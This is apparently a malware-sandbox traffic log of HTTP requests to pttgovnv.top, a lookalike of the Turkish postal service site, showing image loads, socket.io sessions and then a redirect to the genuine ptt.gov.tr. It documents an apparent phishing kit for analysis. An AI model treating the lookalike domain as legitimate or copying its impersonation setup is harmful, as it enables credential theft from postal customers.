Source: global trafficHTTP traffic detected: GET /help/layout/images/46.png HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/43.png HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/44.png HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/47.png HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/48.png HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liMOa HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=-SnapXukcxVrNsxsBQUE HTTP/1.1Host: pttgovnv.topConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://pttgovnv.topSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: SaAybtNMRKOjzf7exhpFJw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /help/layout/images/49.png HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/45.png HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liMU2&sid=-SnapXukcxVrNsxsBQUE HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liMdd&sid=-SnapXukcxVrNsxsBQUE HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/50.png HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/51.png HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/52.png HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/53.png HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liMU5&sid=-SnapXukcxVrNsxsBQUE HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/46.png HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/49.png HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/47.png HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/48.png HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/54.png HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liMdh&sid=-SnapXukcxVrNsxsBQUE HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/50.png HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/53.png HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/52.png HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/51.png HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liMdd&sid=-SnapXukcxVrNsxsBQUE HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liNBO HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/54.png HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=YADBSRy9yTc5Jzd9BQUI HTTP/1.1Host: pttgovnv.topConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://pttgovnv.topSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: 1mo1WLcM7ledEiy756S9NA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liNOR&sid=YADBSRy9yTc5Jzd9BQUI HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liNBO HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liNOP&sid=YADBSRy9yTc5Jzd9BQUI HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liNah&sid=YADBSRy9yTc5Jzd9BQUI HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liNOR&sid=YADBSRy9yTc5Jzd9BQUI HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liNah&sid=YADBSRy9yTc5Jzd9BQUI HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /Sayfalar/Posta/DigerPostaIslemleriUst.aspx HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/fdc30eafd5b8da2a.css HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liODe HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=6dVwkVmS0CuJG3kJBQUL HTTP/1.1Host: pttgovnv.topConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://pttgovnv.topSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: dvwhXHr7VBVxQgPKAl6kTA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liODe HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liOSJ&sid=6dVwkVmS0CuJG3kJBQUL HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/OmnesRegular.2b095194.otf HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.ptt.gov.trsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.ptt.gov.tr/_next/static/css/fdc30eafd5b8da2a.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/fa-solid-900.ce4938a3.woff2 HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.ptt.gov.trsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.ptt.gov.tr/_next/static/css/fdc30eafd5b8da2a.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/fa-brands-400.e465758e.woff2 HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.ptt.gov.trsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.ptt.gov.tr/_next/static/css/fdc30eafd5b8da2a.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/webpack-9869d3074c720ef6.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/framework-0438cefc59f69f60.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liOS7&sid=6dVwkVmS0CuJG3kJBQUL HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
